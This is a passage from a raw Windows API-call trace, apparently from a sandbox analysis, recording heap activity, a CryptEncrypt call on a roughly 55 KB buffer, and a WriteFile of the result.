(HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0265.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0265.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0265.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0265.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0265.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0265.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0265.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0265.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0265.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0265.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0265.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0265.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0265.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0265.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0265.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0265.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0265.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0265.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0265.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0265.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0265.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0265.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0265.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0265.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0265.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0265.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0265.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0265.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0265.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0265.840] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0265.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51e50 [0265.840] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51e50, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0265.841] CryptEncrypt (in: hKey=0xa87110, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f3ea70*, pdwDataLen=0x8cef60*=0xd8c0, dwBufLen=0xd8c8 | out: pbData=0x2f3ea70*, pdwDataLen=0x8cef60*=0xd8c8) returned 1 [0265.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14038 [0265.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0265.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0265.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0265.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0265.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0265.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0265.843] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0265.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0265.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0265.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0265.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0265.843] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.844] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0265.844] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0265.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0265.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0265.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0265.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0265.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0265.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0265.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0265.847] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0265.847] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0265.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0265.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0265.848] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0265.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0265.848] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0265.848] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0265.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0265.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0265.848] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0265.848] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0265.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0265.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0265.848] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0265.848] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0265.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0265.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0265.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0265.849] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0265.849] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0265.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0265.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0265.849] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0265.849] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0265.849] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0265.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0265.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0265.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0265.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0265.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0265.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0265.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0265.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0265.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0265.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0265.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd8c8) returned 0xe50048 [0265.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0265.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0265.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd8c8) returned 0xe6b1e8 [0265.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0265.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0265.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe50048 | out: hHeap=0x970000) returned 1 [0265.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0265.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0265.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0265.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0265.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0265.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd8c8) returned 0xe50048 [0265.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe6b1e8 | out: hHeap=0x970000) returned 1 [0265.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0265.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0265.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd8c8) returned 0xe6b1e8 [0265.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe50048 | out: hHeap=0x970000) returned 1 [0265.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0265.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0265.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0265.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0265.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0265.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0265.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0265.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0265.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0265.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0265.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0265.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0265.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0265.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977de8 | out: hHeap=0x970000) returned 1 [0265.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0265.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0265.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0265.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ef8 | out: hHeap=0x970000) returned 1 [0265.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0265.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0265.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f155c8 | out: hHeap=0x970000) returned 1 [0265.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0265.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0265.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0265.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0265.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0265.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0265.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0265.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0265.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0265.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0265.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c08 | out: hHeap=0x970000) returned 1 [0265.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0265.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f3ea70 | out: hHeap=0x970000) returned 1 [0265.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0265.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0265.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0265.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0265.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0265.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0265.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0265.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0265.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0265.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0265.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0265.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0265.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0265.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0265.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0265.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0265.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0265.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f311a8 | out: hHeap=0x970000) returned 1 [0265.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0265.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0265.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0265.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0265.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0265.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe5d918 | out: hHeap=0x970000) returned 1 [0265.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0265.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0265.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0265.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0265.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0265.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0265.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0265.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0265.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0265.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0265.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0265.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16018 | out: hHeap=0x970000) returned 1 [0265.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0265.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0265.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0265.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0265.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0265.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0265.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0265.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f238e0 | out: hHeap=0x970000) returned 1 [0265.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0265.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0265.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd8c8) returned 0xe50048 [0265.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe6b1e8 | out: hHeap=0x970000) returned 1 [0265.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0265.868] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0265.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0265.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0265.869] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0265.869] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0265.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0265.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0265.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0265.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0265.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0265.870] WriteFile (in: hFile=0x2a0, lpBuffer=0x2f16018*, nNumberOfBytesToWrite=0xd8c8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f16018*, lpNumberOfBytesWritten=0x8cf5e4*=0xd8c8, lpOverlapped=0x0) returned 1 [0265.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0265.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16018 | out: hHeap=0x970000) returned 1 [0265.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0265.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0265.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0265.873] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.873] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.873] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0265.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0265.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0265.873] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0265.873] 